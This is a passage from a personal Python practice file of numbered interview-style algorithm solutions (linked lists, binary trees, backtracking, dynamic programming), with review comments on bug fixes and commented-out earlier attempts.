        else:
            result.append(level[:])
        next_level = []
        for node in level:  # always collect children left-to-right
            if node.left is not None:
                next_level.append(node.left)
            if node.right is not None:
                next_level.append(node.right)
        level = next_level
        reversed_level = not reversed_level
    return result
# 75. Partition List
def partition(head, x):
    """Stable-partition a linked list: nodes with val < x first, then the
    rest, preserving relative order within each group."""
    before_dummy = ListNode(0)  # ListNode is the project's list-node type
    after_dummy = ListNode(0)
    before_tail = before_dummy
    after_tail = after_dummy
    node = head
    while node is not None:
        successor = node.next
        if node.val < x:
            before_tail.next = node
            before_tail = node
            before_tail.next = None  # keep the partial list terminated
        else:
            after_tail.next = node
            after_tail = node
            after_tail.next = None
        node = successor
    if before_dummy.next is not None:
        before_tail.next = after_dummy.next
        return before_dummy.next
    else:
        return after_dummy.next
"""
Above solution using dummy will be a lot easier
def partition_list(head, target):
if head is None:
return None
while head is not None:
if head.data <= target:
if left_start is None:
left_start = head
left_end = left_start
else:
left_end.next = head
left_end = left_end.next
else:
if right_start is None:
right_start = head
right_end = head
else:
right_end.next = head
right_end = right_end.next
head = head.next
if left_start is None:
return right_start
else:
left_end.next = right_start
return left_start
"""
# 76. Combination Sum
# Don't forget to use copy[:]
def combinationSum(candidates, target):
    """All combinations of candidates (reuse allowed) summing to target."""
    found = []
    combinationSum_helper(sorted(candidates), target, [], found) # Look into the question, need sorted
    return found
def combinationSum_helper(candidates, target, res, ret):
    """Extend res using candidates until target is exactly consumed."""
    if target < 0:
        return  # overshot: abandon this branch
    if target == 0:
        ret.append(res[:])
        return
    for idx in range(len(candidates)):
        value = candidates[idx]
        # Slice from idx so a value may repeat but order never reverses.
        combinationSum_helper(candidates[idx:], target - value, res + [value], ret)
"""
def comb_sum(list, target):
ret = []
def comb_sum_helper(list, target, result):
if target < 0:
return
elif target == 0:
ret.append(result[:])
return
for i in list:
result.append(i)
comb_sum_helper(list[i:], target-i, result)
result.pop()
comb_sum_helper(list, target, [])
return ret
"""
# Combination Sum II
# No duplicate item should be used, what I see diff is list[i:] or list[i+1:], needs to be tested
# Bei Ni Ya Cai Dui le
# 77. Pow(x,n)
# WTF is this???
def pow_func(x, n):
    """x**n by recursive squaring (O(log n) multiplications).

    Fixes: `n / 2` is now `n // 2` (float on Python 3), and the negative
    branch uses 1.0 so Python 2 integer division no longer truncates
    pow_func(2, -2) to 0.
    """
    if n == 0:
        return 1
    elif n < 0:
        return 1.0 / pow_func(x, -n)
    else:
        v = pow_func(x, n // 2)
        if n % 2 == 0:
            return v * v
        else:
            return v * v * x  # odd exponent: one extra factor of x
# 78. Construct Binary Tree from Inorder and Postorder Traversal
def contruct_bt_ip(preorder, inorder):
    """Rebuild a binary tree from preorder + inorder sequences.

    Consumes `preorder` from the front.  Fix: the recursive calls used
    the differently-spelled name `construct_bt_ip` (NameError); they now
    match this function's own name.
    """
    if len(inorder) == 0:
        return None
    root = treeNode(preorder.pop(0))  # treeNode: project node type
    root_index = inorder.index(root.data)  # split point between subtrees
    root.left = contruct_bt_ip(preorder, inorder[:root_index])
    root.right = contruct_bt_ip(preorder, inorder[root_index+1:])
    return root
# 79.Letter Combination of a Phone Number
# Easy piece
def phone_num(digits):
    """All letter spellings of a phone digit string; each result is a
    list of characters."""
    digit_map = {
        '2': 'abc',
        '3': 'def',
        '4': 'ghi',
        '5': 'jkl',
        '6': 'mno',
        '7': 'pqrs',
        '8': 'tuv',
        '9': 'wxyz',}
    spelled = []
    def expand(pos, prefix):
        if pos == len(digits):
            spelled.append(prefix[:])
            return
        for letter in digit_map[digits[pos]]:
            prefix.append(letter)
            expand(pos + 1, prefix)
            prefix.pop()
    expand(0, [])
    return spelled
# 80. FUCK this is empty
# 81. Construct Binary Tree from Preorder and Inorder Traversal
# Should be correct. This is almost the same to 78
def contruct_bt_pi(postorder, inorder):
    """Rebuild a binary tree from postorder + inorder sequences.

    Consumes `postorder` from the back, so the RIGHT subtree must be
    built first.  Fix: the recursive calls used the differently-spelled
    name `construct_bt_pi` (NameError); they now match this function,
    and the right subtree is recursed before the left one.
    """
    if len(inorder) == 0:
        return None
    root = treeNode(postorder.pop())  # treeNode: project node type
    root_index = inorder.index(root.data)
    root.right = contruct_bt_pi(postorder, inorder[root_index+1:])
    root.left = contruct_bt_pi(postorder, inorder[:root_index])
    return root
# 82. Palindrome Partitioning
# Not 100% sure it's correct, but will discuss it later
def palin_parti(string):
    """All ways to split `string` into palindromic substrings.

    Fix: the original defined its helper but never invoked it and never
    returned `ret`, so every call returned None.
    """
    ret = []
    def palin_parti_helper(s, result):
        if not s:
            ret.append(result[:])  # the whole string was consumed
        else:
            for i in range(len(s)):
                if is_palindrome(s[:i+1]):
                    result.append(s[:i+1])
                    palin_parti_helper(s[i+1:], result)
                    result.pop()
    palin_parti_helper(string, [])
    return ret
def is_palindrome(s):
    """Two-pointer palindrome check."""
    start = 0
    end = len(s) - 1
    while start < end:
        if s[start] != s[end]:
            return False
        start += 1
        end -= 1
    return True
# 83. Reverse Linked List II
# Really don't want to think about it right now
def reverse_list_ii(head, m, n):
    """Reverse linked-list positions m..n in place (1-indexed).

    NOTE(review): `reverse_head` on the i == n branch is never assigned
    anywhere (only start_tail/reverse_end/prev are), so reaching it
    raises NameError; the function also never returns the new head and
    ignores the m == 1 case.  Needs a rewrite before use.
    """
    i = 1
    while head is not None and i <= n:
        if i < m-1:
            head = head.next
            i += 1
        elif i == m-1:
            start_tail = head        # node just before the reversed span
            reverse_end = head.next  # will become the span's tail
            prev = None
            head = head.next
            i += 1
        elif i >=m and i <n:
            next = head.next
            head.next = prev  # standard in-place pointer flip
            prev = head
            head = next
            i += 1
        elif i == n:
            start_tail.next = reverse_head
            reverse_end.next = head.next
# 84. N-Queens
# There's also n queens ii
# I think this is correct, but need deep validation
# valid check isn't efficient
# This is not correct, n queens question is n*n chessboard but not always 8*8
def solveNQueens(n):
    """All n-queens placements, each a list of 'Q'/'.' row strings."""
    solutions = []
    solveNQueens_helper(n, ['.' * n for _ in range(n)], solutions, 0)
    return solutions
def solveNQueens_helper(n, res, ret, queens):
    """Try every column for the queen on row `queens`, recursing on success."""
    if queens == n:
        ret.append(res[:])
        return
    blank = '.' * n
    for col in range(n):
        res[queens] = blank[:col] + 'Q' + blank[col + 1:]
        if is_valid(res, queens, col):
            solveNQueens_helper(n, res, ret, queens + 1)
        res[queens] = blank  # clear the row before trying the next column
def is_valid(board, row, col):
    """No earlier queen shares this column or either diagonal."""
    width = len(board[0])
    for r in range(row):
        for c in range(width):
            if board[r][c] == 'Q' and (c == col or abs(row - r) == abs(col - c)):
                return False
    return True
"""
def n_queens(n):
result = ['.' for i in range(8)]
ret = []
def n_queens_helper(i, result, queens):
if queens == 0:
ret.append(result[:])
for j in range(8):
result[i] = j
if is_valid_result(result, i):
n_queens_helper(i+1, result, queens-1)
result[i] = '.'
def is_valid_result(result, i):
for j in range(i):
if result[i] == result[j] or abs(result[i]-result[j]) == abs(i-j):
return False
return True
n_queens_helper(0, result, n)
return ret
def n_queens_ii(n):
result = ['.' for i in range(8)]
ret = 0
def n_queens_helper(i, result, queens):
if queens == 0:
ret += 1
for j in range(8):
result[i] = j
if is_valid_result(result, i):
n_queens_helper(i+1, result, queens-1)
result[i] = '.'
def is_valid_result(result, i):
for j in range(i):
if result[i] == result[j] or abs(result[i]-result[j]) == abs(i-j):
return False
return True
n_queens_helper(0, result, n)
return ret
# Don't know what's the diff, just return a num += 1
"""
# 85. Validate Binary Search Tree
# Best way to do this in recursion
def valid_bst(root):
    """True iff the tree is a strict BST (no duplicate values allowed).

    Fix: INT_MIN/INT_MAX were undefined globals (NameError); infinite
    float bounds are used instead.
    """
    return valid_bst_helper(root, float('-inf'), float('inf'))
def valid_bst_helper(node, min, max):
    """Every value in this subtree must lie strictly inside (min, max)."""
    if node is None:
        return True
    if node.data <= min or node.data >= max:
        return False
    return valid_bst_helper(node.left, min, node.data) and valid_bst_helper(node.right, node.data, max)
# 86. Add Binary
# Pad with zeros
def add_binary(a, b):
    """Add two binary strings and return the binary sum string.

    Fix: the carry now uses floor division (//) so it stays an int on
    Python 3 (with `/` the carry became a float and the digits rendered
    as '1.0').
    """
    int_a = [ int(i) for i in a]
    int_b = [ int(i) for i in b]
    carry = 0
    result = []
    la = len(int_a)
    lb = len(int_b)
    # Left-pad the shorter operand with zeros so both align.
    if la > lb:
        int_b = [0 for i in range(la-lb)] + int_b
        lb = len(int_b)
    else:
        int_a = [0 for i in range(lb-la)] + int_a
        la = len(int_a)
    for i in range(1, la+1):  # walk from the least significant bit
        curr_bit = (int_a[-i] + int_b[-i] + carry) % 2
        carry = (int_a[-i] + int_b[-i] + carry) // 2
        result.insert(0, str(curr_bit))
    if carry == 1:
        result.insert(0, '1')
    return ''.join(result)
# 87. Next Permutation:
def nextPermutation(num):
    """Rearrange num into its next lexicographic permutation (wraps to the
    sorted order when num is already the largest).

    Fix: the pivot scan stopped at `i > 1`, so fully non-increasing
    inputs like [2, 1] or [3, 2, 1] never hit the i == 0 wrap-around
    branch and crashed with IndexError in the swap below.
    """
    if len(num) <= 1:
        return num
    i = len(num) - 1
    while i > 0 and num[i-1] >= num[i]: # It's >= ; find the ascent from the right
        i -= 1
    num = num[:i] + sorted(num[i:])  # suffix becomes the smallest arrangement
    if i == 0:
        return num  # whole array was non-increasing: wrapped to sorted order
    j = i
    while j < len(num) and num[i-1] >= num[j]: # again >= ; smallest value > pivot
        j += 1
    swap(i-1, j, num)
    return num
def swap(i, j, num):
    """Exchange num[i] and num[j] in place."""
    tmp = num[i]
    num[i] = num[j]
    num[j] = tmp
"""
Wrong answer, this not sorting the rest list
def next_perm(list):
l = len(list)
for i in range(1, l):
for j in range(i+1, l+1):
if list[-i] > list[-j]:
tmp = list[-i]
list[-i] = list[-j]
list[-j] = tmp
return list
return list[::-1]
"""
# 88. Permutations II
# First redo the permutation_i
# Pay attention to this!!!! len(a) == 0 != a is None
def perm_i(list):
    """All permutations of list; an empty list yields [[]]."""
    if len(list) == 0:
        return [[]]
    out = []
    for pos in range(len(list)):
        chosen = list[pos]
        others = list[:pos] + list[pos + 1:]
        for tail in perm_i(others):
            out.append([chosen] + tail)
    return out
# Nothing much diff. But use a dict to note which ones are used
def permutations_ii(list):
    """Unique permutations of a list that may contain duplicates.

    Fixes: the original's dedup dict was shared across ALL recursion
    levels (so values were wrongly skipped at the top level), and the
    recursion delegated to the non-deduplicating perm_i, producing
    duplicate permutations.  The dedup set is now per recursion level
    and the recursion is self-contained.
    """
    def perm_ii(items):
        if len(items) == 0:
            return [[]]
        res = []
        seen = {}  # values already used as the head at THIS level
        for i, e in enumerate(items):
            if e in seen:
                continue
            seen[e] = True
            rest = items[:i] + items[i+1:]
            for perm in perm_ii(rest):
                res.append([e] + perm)
        return res
    return perm_ii(list)
# 89. Remove Duplicates from Sorted List II
# So many traps. Need to remember to set unused.next = None
"""
This is something I really need dummy here
I don't even want to look at this answer again
def remove_dup_from_list_ii(head):
prev = head
current = head.next
unique_head = None
last = None
while current is not None:
if prev.data == current.data:
while current is not None and current.data == prev.data:
current = current.next
if current is not None:
prev = current
current = current.next
else:
if unique_head is None:
unique_head = prev
last = prev
else:
last.next = prev
last = last.next
last.next = None
prev = current
current = current.next
return unique_head
"""
# 90. Insertion Sort List\
def insertionSortList(self, head):
    # 90. Insertion Sort List: sort a singly linked list in place and
    # return the new head.
    # The dummy holds INT64_MIN so the insertion scan below always finds a
    # predecessor whose value is smaller than any real node's value.
    dummy = ListNode(-9223372036854775807-1)
    dummy.next = head
    cur = dummy
    while cur.next is not None:
        if cur.val < cur.next.val:
            # Already ordered relative to cur: the sorted prefix grows.
            cur = cur.next
        else:
            # Detach the out-of-order node...
            insert = cur.next
            cur.next = insert.next
            # ...then scan from the front for its insertion point.
            start = dummy
            while start.val < insert.val:
                prev = start
                start = start.next
            # prev is always bound here: the first test passes because
            # dummy.val is INT64_MIN (unless insert.val is itself INT64_MIN
            # — TODO confirm inputs never contain that sentinel value).
            prev.next = insert
            insert.next = start
    return dummy.next
# Write everything in one func MAY increase the speed of processing
# Made a mistake here, pasted the code to Sort List and coulnd't pass...
# 1. The insertion sort shown in wiki, will check from back to front. It's the same to check from front-back
"""
# Sister is too niubi
# Inpired by the dummy here
def insertion_sort_list(head):
dummy = Node(0)
dummy.next = head
current = head
while current.next is not None:
if current.next.data >= current.data:
current = current.next
else:
insert(dummy, current, current.next)
return dummy.next
def insert(dummy, tail, node):
current = dummy
while node.data > current.nextdata:
current = current.next
tail.next = node.next
node.next = current.next
current.next = node
"""
# 91. Edit Distance
# Same to the C anwser, need to understand the meaning of M, N, also the boundary
def edit_distance(word1, word2):
    """Levenshtein distance between word1 and word2.

    Insertions, deletions and replacements each cost 1; computed with a
    full (len(word2)+1) x (len(word1)+1) DP table where table[r][c] is the
    distance between word2[:r] and word1[:c].
    """
    cols = len(word1)
    rows = len(word2)
    table = [[0] * (cols + 1) for _ in range(rows + 1)]
    for r in range(rows + 1):
        table[r][0] = r          # delete every char of word2's prefix
    for c in range(cols + 1):
        table[0][c] = c          # build word1's prefix from nothing
    for r in range(1, rows + 1):
        for c in range(1, cols + 1):
            if word1[c-1] == word2[r-1]:
                table[r][c] = table[r-1][c-1]
            else:
                table[r][c] = 1 + min(table[r-1][c], table[r][c-1], table[r-1][c-1])
    return table[rows][cols]
# 92. Reverse Nodes in k-Group
# Personal written
def reverseKGroup(head, k):
    # 92. Reverse Nodes in k-Group: reverse every consecutive group of k
    # nodes; a trailing group shorter than k is left untouched.
    if k <= 1:
        return head
    dummy = ListNode(0)
    dummy.next = head
    # Count the nodes so we know how many *full* groups exist.
    total_nodes = 0
    cur = head
    while cur is not None:
        cur = cur.next
        total_nodes += 1
    # BUG FIX: use floor division; under Python 3 `/` yields a float, which
    # made the group loop below run once too often when a partial trailing
    # group existed (reversing nodes that should stay in order).
    n = total_nodes // k
    prev = dummy
    while n > 0:
        # Reverse one group by head-inserting its k-1 successors after prev.
        i = 1
        cur = prev.next
        while i < k:
            move = cur.next
            cur.next = move.next
            move.next = prev.next
            prev.next = move
            i += 1
        prev = cur    # cur is now the tail of the reversed group
        n -= 1
    return dummy.next
"""
From annie's
# Remember the way to play the list node
def reverse_nodes_in_k(head, k):
dummy = Node(0)
dummy.next = head
length = get_len(head)
reverse_time = length / k
ins = dummy
current = head
while reverse_time > 0:
for i in range(k-1):
move = current.next
current.next = move.next
move.next = current
ins.next = move
ins = current
current = current.next
reverse_time -= 1
return dummy.next
def get_len(head):
len = 0
while head is not None:
head = head.next
len += 1
return len
"""
# 93. Gas Station
# Couldn't understand
def gas_station(gas, cost):
    """Return the start station index from which the circular route can be
    completed, or -1 when the total gas is insufficient.

    Single greedy pass: whenever the running tank dips below zero, no
    station between the current candidate and here can be the answer, so
    the candidate jumps past the failure point.
    """
    tank = 0        # gas left since the current candidate start
    total = 0       # overall gas balance for the whole loop
    candidate = 0
    for i in range(len(gas)):
        delta = gas[i] - cost[i]
        total += delta
        tank += delta
        if tank < 0:
            candidate = i + 1
            tank = 0
    return -1 if total < 0 else candidate
# 94. Combination Sum II
# Fucking moji
def comb_sum_ii(list, target):
    # 94. Combination Sum II: unique combinations drawn from `list` (each
    # element usable at most once) that sum to target. Assumes positive
    # candidates, as in the original problem.
    # BUG FIXES vs the original:
    #   * `sorted(list)` discarded its result, so the list was never
    #     actually sorted and duplicate skipping could not work;
    #   * the skip test `list[j+1] == list[j]` dropped the FIRST element of
    #     a duplicate run, losing combinations that need the duplicate
    #     (e.g. [1, 1, 6] for target 8).
    nums = sorted(list)
    N = len(nums)
    ret = []

    def comb_sum_helper(i, target, result):
        if target == 0:
            ret.append(result[:])
            return
        if target < 0:
            return
        for j in range(i, N):
            # Skip a duplicate only when its twin was already tried at this
            # same recursion depth (j > i), never the first occurrence.
            if j > i and nums[j] == nums[j-1]:
                continue
            result.append(nums[j])
            comb_sum_helper(j + 1, target - nums[j], result)
            result.pop()

    comb_sum_helper(0, target, [])
    return ret
# 95. Distinct Subsequences
# Need a better understanding in DP
def distinct_subs(S, T):
    # 95. Distinct Subsequences: number of distinct subsequences of S that
    # equal T, bottom-up DP.
    # BUG FIX: the original contained `len(S) = M` (assignment to a call —
    # a SyntaxError) and its initialisation loops mixed up i and j.
    # dp[i][j] = number of ways to build T[:i] out of S[:j].
    M = len(S)
    N = len(T)
    dp = [[0 for i in range(M+1)] for j in range(N+1)]
    for j in range(M+1):
        dp[0][j] = 1              # the empty T can be built exactly one way
    for i in range(1, N+1):
        for j in range(1, M+1):
            dp[i][j] = dp[i][j-1]             # ways that skip S[j-1]
            if S[j-1] == T[i-1]:
                dp[i][j] += dp[i-1][j-1]      # ways using S[j-1] for T[i-1]
    return dp[N][M]
# Why not this?
def distinct_subs(S, T):
    # Recursive answer to the "why not this?" question above.
    # BUG FIXES: the original did `result += 1` on a closed-over int, which
    # raises UnboundLocalError, and its `T in S` test counted contiguous
    # substrings rather than subsequences. This memoised recursion counts
    # the ways to build T[j:] from S[i:]. NOTE: this def shadows the DP
    # version above (both were kept in the file for study).
    from functools import lru_cache

    @lru_cache(maxsize=None)
    def count(i, j):
        if j == len(T):
            return 1              # all of T matched
        if i == len(S):
            return 0              # S exhausted before T
        ways = count(i + 1, j)    # skip S[i]
        if S[i] == T[j]:
            ways += count(i + 1, j + 1)   # use S[i] to match T[j]
        return ways

    return count(0, 0)
# 96. Jump Game II
# Using a dp way, but there's simpler way without dp
def jump_game_ii(jump_list):
    # 96. Jump Game II, DP formulation: minimum number of jumps from index
    # 0 to the last index; jump_list[i] is the maximum jump length from i.
    # BUG FIXES: `if start + jump_list[start]+1:` tested the truthiness of
    # an int (almost always true, so the function returned immediately),
    # and step[0] was seeded with 1 instead of 0.
    N = len(jump_list)
    if N <= 1:
        return 0
    step = [float('inf')] * N   # step[i]: fewest jumps known to reach i
    step[0] = 0
    for start in range(N - 1):
        if start + jump_list[start] >= N - 1:
            # One more jump from `start` reaches the end.
            return step[start] + 1
        for i in range(start + 1, min(start + jump_list[start] + 1, N)):
            step[i] = min(step[i], step[start] + 1)
    # Unreachable end: step[N-1] is still infinity.
    return step[N-1]
# Greedy algorithm. Almost the same. But dp is easier to think but with a O(n) list
def jump_game_ii(jump_list):
    # Greedy version (shadows the DP version above): from each position,
    # jump to the reachable index with the furthest onward reach.
    # BUG FIXES: when no progress was possible (a zero jump short of the
    # end) the original looped forever because `start = mx` never moved;
    # and a 0/1-element list fell off the loop returning None instead of 0.
    N = len(jump_list)
    start = 0
    res = 0
    while start < N - 1:
        res += 1
        if start + jump_list[start] >= N - 1:
            return res
        mx = start
        for i in range(start + 1, start + jump_list[start] + 1):
            # Pick the candidate whose own reach extends furthest.
            if i + jump_list[i] > mx + jump_list[mx]:
                mx = i
        if mx == start:
            return -1   # stuck: the end is unreachable
        start = mx
    return res
# 97. Merge k Sorted Lists
def merge_k_sorted_lists(lists):
    # 97. Merge k Sorted Lists: repeatedly take the smallest head among the
    # k lists via a priority queue, reusing the input nodes.
    # NOTE(review): `PriorityQueue` here is NOT the stdlib
    # queue.PriorityQueue (that has put/get, not push/top/len). Presumably
    # a project helper ordering nodes by .data whose top() also REMOVES the
    # node — verify, since a non-removing top() would make this loop spin
    # forever on the same element.
    dummy = Node(0)
    current = dummy
    q = PriorityQueue()
    # Seed the queue with each non-empty list's head.
    for head in lists:
        if head is not None:
            q.push(head)
    while len(q) > 0:
        node = q.top()
        # Append the smallest node and advance the output tail.
        current = current.next = node
        if node.next is not None:
            q.push(node.next)   # its successor becomes the new candidate
    return dummy.next
# 98. Zigzag Conversion
# Best result. Remember it's if if if but not if elif ...
def zigzag_convert(str, n):
    # 98. Zigzag Conversion: read `str` written in an n-row zigzag, row by
    # row. For row i the period is zig = 2n-2 and each period contributes
    # str[j-i] (the up-stroke, middle rows only) and str[j+i].
    # BUG FIX: n == 1 makes zig == 0, so `j += zig` never advanced and the
    # inner loop ran forever; a single row is just the original string.
    if n <= 1:
        return str
    result = []
    zig = 2*n - 2
    N = len(str)
    for i in range(n):
        j = 0
        while True:
            if i > 0 and i < n-1 and j-i > 0 and j-i < N:
                result.append(str[j-i])
            if j+i < N:
                result.append(str[j+i])
            if j+i > N:
                break
            j += zig
    return ''.join(result)
# my stupid way
def zigzag_convert(str, n):
    # Index-arithmetic variant (shadows the version above): row i holds the
    # "red" characters at j*zig + i and, for middle rows, the "green"
    # characters at j*zig - i.
    # BUG FIX: n == 1 makes zig == 0, so red_index stayed at i forever and
    # the loop appended the same character endlessly; one row is just the
    # original string.
    if n <= 1:
        return str
    result = []
    zig = 2*n - 2
    N = len(str)
    for i in range(n):
        j = 0
        red_index = 0
        while red_index < N:
            red_index = j*zig + i
            if red_index < N:
                result.append(str[red_index])
                j += 1
            else:
                break
            if i == 0 or i == n-1:
                continue          # first/last rows have no up-stroke char
            green_index = j*zig - i
            if green_index > 0 and green_index < N:
                result.append(str[green_index])
    return ''.join(result)
# 99. Anagrams
# Main Idea is to sort and then check each one's letters
def anagrams(list):
    """Return the first group of words (in input order) that are anagrams
    of one another, or None when no such group exists.

    Words sharing the same sorted-letter signature are anagrams.
    """
    groups = {}
    for word in list:
        signature = ''.join(sorted(word))
        groups.setdefault(signature, []).append(word)
    for members in groups.values():
        if len(members) > 1:
            return members
    return None
# 100. Add Two Numbers
# Slim version
def add_two_num(l1, l2):
    # 100. Add Two Numbers (slim version): each list stores one number's
    # digits least-significant first; returns their sum as a new list.
    # BUG FIXES: `currnet = current.next` was a typo, so the output cursor
    # never advanced and every digit overwrote dummy.next; and `sum / 10`
    # is float division under Python 3 — divmod keeps everything integral.
    carry = 0
    dummy = Node(0)
    current = dummy
    while l1 is not None or l2 is not None or carry != 0:
        total = carry
        if l1 is not None:
            total += l1.data
            l1 = l1.next
        if l2 is not None:
            total += l2.data
            l2 = l2.next
        carry, digit = divmod(total, 10)
        current.next = Node(digit)
        current = current.next
    return dummy.next
# dummy version
def add_two_num(l1, l2):
    # Branch-per-case version (shadows the slim one above): handles the
    # both/only-l1/only-l2/carry-only cases explicitly.
    # BUG FIX: carry was computed with `/`, which produces floats under
    # Python 3; divmod keeps digit and carry as ints.
    carry = 0
    dummy = Node(0)
    current = dummy
    while True:
        if l1 is not None and l2 is not None:
            carry, digit = divmod(l1.data + l2.data + carry, 10)
            l1 = l1.next
            l2 = l2.next
        elif l2 is not None:          # l1 exhausted
            carry, digit = divmod(l2.data + carry, 10)
            l2 = l2.next
        elif l1 is not None:          # l2 exhausted
            carry, digit = divmod(l1.data + carry, 10)
            l1 = l1.next
        elif carry != 0:              # both exhausted, final carry digit
            digit = carry
            carry = 0
        else:
            break
        current.next = Node(digit)
        current = current.next
    return dummy.next
# 101. Longest Substring Without Repeating Characters
def lengthOfLongestSubstring(self, s):
    """Length of the longest substring of s with no repeating characters.

    Sliding window: `left` marks the window start and last_seen maps each
    character to the index of its most recent occurrence.
    """
    left = 0
    best = 0
    last_seen = {}
    for right, ch in enumerate(s):
        prev = last_seen.get(ch)
        if prev is not None and prev + 1 > left:
            left = prev + 1       # jump past the previous occurrence
        last_seen[ch] = right
        best = max(best, right - left + 1)
    return best
"""
This is totally wrong, aslo will pass the time
def longest_substring(str):
d = {}
max_len = 0
current = 0
for i, c in enumerate(str):
if c not in d:
d[c] = True
current += 1
max_len = max(current, max_len)
else:
d = { c : True }
current = 1
return max_len
"""
# 102. Recover Binary Search Tree
# Way to think it
def recover_best(root):
    # 102. Recover Binary Search Tree: exactly two nodes of a BST had their
    # values swapped; swap them back and return the root.
    # BUG FIX: the original tried to report Node1/Node2/prev through plain
    # parameters, but Python cannot rebind a caller's locals, so the
    # helper's findings were always lost (it also referenced the undefined
    # names `recover_bst` and `current`). Collect the inorder sequence and
    # swap the two values that break the sorted order instead.
    nodes = []
    stack = []
    node = root
    while stack or node is not None:      # iterative inorder traversal
        while node is not None:
            stack.append(node)
            node = node.left
        node = stack.pop()
        nodes.append(node)
        node = node.right
    first = None
    second = None
    for a, b in zip(nodes, nodes[1:]):
        if a.data > b.data:               # an inversion in sorted order
            if first is None:
                first = a                 # first inversion: left offender
            second = b                    # last inversion: right offender
    if first is not None:
        first.data, second.data = second.data, first.data
    return root
# 103. Copy List with Random Pointer
# Not correct
def copy_list(head):
    # 103. Copy List with Random Pointer — the classic three-pass, O(1)
    # extra-space clone. (Despite the old "Not correct" note above, the
    # passes below do implement the standard interleaving scheme.)
    if head is None:
        return None
    # Pass 1: splice a copy of each node right after its original,
    # producing A -> A' -> B -> B' -> ...
    cur = head
    while cur is not None:
        newNode = RandomListNode(cur.label)
        newNode.next = cur.next
        cur.next = newNode
        cur = newNode.next
    # Pass 2: each copy's random target is the node directly AFTER the
    # original's random target (i.e. that node's clone).
    cur = head
    while cur is not None:
        newNode = cur.next
        if cur.random is not None: # random pointer may not exist
            newNode.random = cur.random.next
        cur = newNode.next
    # Pass 3: unweave the two interleaved lists, restoring the original
    # list and isolating the clone.
    cur = head
    newNodehead = head.next
    while cur is not None:
        newNode = cur.next
        cur.next = newNode.next
        if newNode.next is not None:
            newNode.next = newNode.next.next
        cur = cur.next
    return newNodehead
# 104. Best Time to Buy and Sell Stock III
# see 33
# 105. Valid Palindrome
# Too dan teng
def valid_palin(str):
    # 105. Valid Palindrome: consider only alphanumeric characters and
    # ignore case; the empty string is a palindrome.
    # BUG FIX: the original compared characters case-sensitively, so
    # "A man, a plan, a canal: Panama" was wrongly rejected.
    start = 0
    end = len(str) - 1
    while start < end:
        # Skip non-alphanumeric characters from both ends.
        while start < end and not str[start].isalnum():
            start += 1
        while start < end and not str[end].isalnum():
            end -= 1
        if str[start].lower() != str[end].lower():
            return False
        start += 1
        end -= 1
    return True
# 106. First Missing Positive
# Not done yet
def first_missing_poisitve(num_list):
    # 106. First Missing Positive (the name keeps the original typo so any
    # existing callers still resolve). O(n) time, O(1) extra space.
    # BUG FIX: the original ended mid-statement (`if num_list!=`), a
    # SyntaxError that made the whole module unimportable.
    # Cyclic sort: put each value v with 1 <= v <= n into slot v-1; the
    # first slot whose value is wrong gives the answer.
    n = len(num_list)
    for i in range(n):
        # Each swap places one value in its home slot, so the total work
        # across the whole loop stays O(n).
        while 0 < num_list[i] <= n and num_list[num_list[i] - 1] != num_list[i]:
            home = num_list[i] - 1
            num_list[i], num_list[home] = num_list[home], num_list[i]
    for i in range(n):
        if num_list[i] != i + 1:
            return i + 1
    return n + 1
# 107. Rotate List
def rotate_list(head, k):
    # 107. Rotate List: rotate the list to the right by k places.
    # BUG FIXES: the original crashed when k >= length (the fast pointer
    # walked off the end), returned None for k == 0 (dummy.next was never
    # set to a real node), and never reduced k modulo the list length.
    if head is None or head.next is None:
        return head
    # Measure the list and find its tail.
    length = 1
    tail = head
    while tail.next is not None:
        tail = tail.next
        length += 1
    k = k % length
    if k == 0:
        return head           # rotation is a no-op
    # The node length-k-1 hops from the head becomes the new tail.
    new_tail = head
    for _ in range(length - k - 1):
        new_tail = new_tail.next
    new_head = new_tail.next
    new_tail.next = None
    tail.next = head          # old tail links back to the old head
    return new_head
# 108. Scramble String
def scramble_str(s1, s2):
    # 108. Scramble String: entry point.
    # BUG FIX: the original called the misspelt, undefined name `sramble`.
    if len(s1) != len(s2):
        return False
    return scramble(s1, s2)

def scramble(s1, s2):
    # True if s2 can be obtained from s1 by recursively splitting s1 into
    # two non-empty parts and optionally swapping them.
    # BUG FIXES: the split loop started at i == 0 (and ran to len(s1)),
    # which recursed on the unchanged strings and never terminated; and the
    # "swapped" branch compared slices of different lengths (s1[:i] vs
    # s2[i:]). The swapped counterpart of prefix s1[:i] is the SUFFIX
    # s2[n-i:].
    if s1 == s2:
        return True
    if not has_same_letter(s1, s2):
        return False          # cheap prune: different multisets of letters
    n = len(s1)
    for i in range(1, n):     # split points leave both sides non-empty
        if scramble(s1[:i], s2[:i]) and scramble(s1[i:], s2[i:]):
            return True
        if scramble(s1[:i], s2[n-i:]) and scramble(s1[i:], s2[:n-i]):
            return True
    return False

def has_same_letter(s1, s2):
    # True when s1 and s2 are permutations of each other.
    # BUG FIXES: the original never decremented multi-occurrence counts, so
    # repeated letters compared wrongly, and it ended in `return Fasle`
    # (a NameError). A multiset comparison expresses the intent directly.
    from collections import Counter
    return Counter(s1) == Counter(s2)
# 109. 4Sum
def four_sum(s, target):
    # 109. 4Sum: all UNIQUE quadruplets from s summing to target.
    # BUG FIXES: the original never sorted or deduplicated, so duplicate
    # input values produced duplicate quadruplets; and the short-input path
    # returned None instead of an empty list.
    ret = []
    if len(s) < 4:
        return ret
    four_sum_helper(sorted(s), target, [], ret)
    return ret

def four_sum_helper(s, target, res, ret):
    # Depth-first over sorted candidates; res holds the partial quadruplet.
    if len(res) == 4:
        if target == 0:
            ret.append(res[:])
        return
    if len(s) < 4 - len(res):
        return                 # not enough elements left to finish
    for i, num in enumerate(s):
        # Skip a duplicate value at the same depth (s is sorted, so equal
        # values are adjacent); the first occurrence is always tried.
        if i > 0 and s[i] == s[i-1]:
            continue
        res.append(num)
        four_sum_helper(s[i+1:], target - num, res, ret)
        res.pop()
# 110. Sqrt(x)
def sqrt(x):
    # 110. Sqrt(x): integer (floor) square root by binary search.
    # BUG FIXES: sys.maxint no longer exists under Python 3, and `/` there
    # yields floats, breaking the index arithmetic. Searching [0, x] needs
    # no maxint bound at all.
    start = 0
    end = x
    while start <= end:
        mid = (start + end) // 2
        sqr = mid * mid
        if sqr == x:
            return mid
        elif sqr < x:
            start = mid + 1
        else:
            end = mid - 1
    # The loop ends with start == end + 1 and end == floor(sqrt(x)).
    return end
# 111. Permutation Sequence
# Way to think:
# 1 2 3 Group them by first digit 1, 2, 3,
# 1 3 2 Will see that (n-1)! is the permutation times of n-1 digits.
